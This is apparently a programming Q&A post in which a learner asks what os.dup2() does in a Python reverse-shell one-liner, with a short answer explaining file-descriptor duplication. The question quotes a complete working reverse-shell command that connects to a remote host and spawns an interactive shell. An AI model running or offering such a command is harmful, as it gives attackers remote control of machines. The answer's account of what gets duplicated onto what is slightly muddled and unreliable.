Tags: python, malware, shellcode, dup2, reverse-shell

What is the os.dup2() method for and what is its use?


I am learning python and hacking stuff, when I came across the following code snippet:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.20.14",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

It's shell code to get a reverse shell. I do understand Python code, but I am not able to figure out what that os.dup2() is for and what it is doing there, and on the last line it's written p=subprocess.call(["/bin/sh","-i"]). How is the p variable being executed?

If possible, answer in detail along with resources from which I can do further research.


Solution

  • dup2() is a system call which duplicates an existing file descriptor. See https://man7.org/linux/man-pages/man2/dup.2.html.

    File descriptors 0, 1 and 2 are standard input, standard output and standard error, so what this code is doing is duplicating each of those file descriptors (which are associated with the socket) to another file descriptor for the use of the invoked /bin/sh process.